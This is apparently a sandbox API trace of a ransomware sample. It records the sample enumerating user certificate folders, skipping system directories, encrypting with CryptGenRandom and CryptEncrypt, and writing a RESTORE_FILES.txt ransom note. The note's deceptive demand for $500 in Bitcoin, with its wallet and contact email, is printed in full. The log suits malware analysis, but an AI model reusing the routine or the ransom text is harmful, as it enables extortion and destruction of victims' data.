[0095.043] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.043] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.") returned 67 [0095.043] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.043] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.043] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.043] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0095.043] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0095.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.043] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0095.044] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.044] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.044] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.044] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.044] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.044] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\..") returned 68 [0095.044] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.044] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.044] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.044] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.044] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0095.044] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0095.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.044] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0095.044] lstrcmpiW (lpString1="My", lpString2="Windows") returned -1 [0095.044] lstrcmpiW (lpString1="My", lpString2="Program Files") returned -1 [0095.044] lstrcmpiW (lpString1="My", lpString2="Program Files (x86)") returned -1 [0095.044] lstrcmpiW (lpString1="My", lpString2="$Recycle.bin") returned 1 [0095.044] lstrcmpiW (lpString1="My", lpString2="System Volume Information") returned -1 [0095.044] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned 68 [0095.044] lstrcmpW (lpString1="My", lpString2=".") returned 1 [0095.044] lstrcmpW (lpString1="My", lpString2="..") returned 1 [0095.044] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned 70 [0095.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0095.045] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.045] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.045] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.045] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.045] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.045] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.") returned 70 [0095.045] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.045] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.045] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.045] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.045] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.045] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.045] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.045] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.045] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.045] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.045] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\..") returned 71 [0095.045] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.045] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.045] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.045] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.046] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.046] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.046] lstrcmpiW (lpString1="Certificates", lpString2="Windows") returned -1 [0095.046] lstrcmpiW (lpString1="Certificates", lpString2="Program Files") returned -1 [0095.046] lstrcmpiW (lpString1="Certificates", lpString2="Program Files (x86)") returned -1 [0095.046] lstrcmpiW (lpString1="Certificates", lpString2="$Recycle.bin") returned 1 [0095.046] lstrcmpiW (lpString1="Certificates", lpString2="System Volume Information") returned -1 [0095.046] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned 81 [0095.046] lstrcmpW (lpString1="Certificates", lpString2=".") returned 1 [0095.046] lstrcmpW (lpString1="Certificates", lpString2="..") returned 1 [0095.047] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned 83 [0095.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0095.047] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.047] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.047] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.047] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.047] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.047] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.") returned 83 [0095.047] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.047] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.047] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.047] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0095.047] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0095.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.047] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0095.047] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.047] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.047] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.047] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.047] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.047] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\..") returned 84 [0095.047] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.047] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.047] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.047] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.048] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0095.048] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0095.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.048] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0095.048] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0095.048] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\RESTORE_FILES.txt") returned 99 [0095.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.048] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.048] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0095.049] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.049] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0095.049] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.049] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0095.050] CloseHandle (hObject=0x150) returned 1 [0095.050] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.050] lstrcmpiW (lpString1="CRLs", lpString2="Windows") returned -1 [0095.050] lstrcmpiW (lpString1="CRLs", lpString2="Program Files") returned -1 [0095.050] lstrcmpiW (lpString1="CRLs", lpString2="Program Files (x86)") returned -1 [0095.050] lstrcmpiW (lpString1="CRLs", lpString2="$Recycle.bin") returned 1 [0095.050] lstrcmpiW (lpString1="CRLs", lpString2="System Volume Information") returned -1 [0095.050] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned 73 [0095.050] lstrcmpW (lpString1="CRLs", lpString2=".") returned 1 [0095.050] lstrcmpW (lpString1="CRLs", lpString2="..") returned 1 [0095.050] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned 75 [0095.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0095.050] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.050] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.050] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.050] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.050] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.050] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.") returned 75 [0095.050] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.050] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.050] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.050] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0095.051] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0095.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.051] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0095.051] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.051] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.051] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.051] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.051] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.051] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\..") returned 76 [0095.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.051] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.051] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.051] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0095.051] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0095.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.051] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0095.051] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0095.051] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\RESTORE_FILES.txt") returned 91 [0095.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.052] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.052] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0095.053] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.053] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0095.053] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.053] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0095.053] CloseHandle (hObject=0x150) returned 1 [0095.053] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.053] lstrcmpiW (lpString1="CTLs", lpString2="Windows") returned -1 [0095.053] lstrcmpiW (lpString1="CTLs", lpString2="Program Files") returned -1 [0095.053] lstrcmpiW (lpString1="CTLs", lpString2="Program Files (x86)") returned -1 [0095.053] lstrcmpiW (lpString1="CTLs", lpString2="$Recycle.bin") returned 1 [0095.053] lstrcmpiW (lpString1="CTLs", lpString2="System Volume Information") returned -1 [0095.053] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned 73 [0095.053] lstrcmpW (lpString1="CTLs", lpString2=".") returned 1 [0095.053] lstrcmpW (lpString1="CTLs", lpString2="..") returned 1 [0095.054] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned 75 [0095.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0095.054] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.054] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.054] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.054] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.054] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.054] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.") returned 75 [0095.054] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.054] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.054] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.054] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0095.054] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, 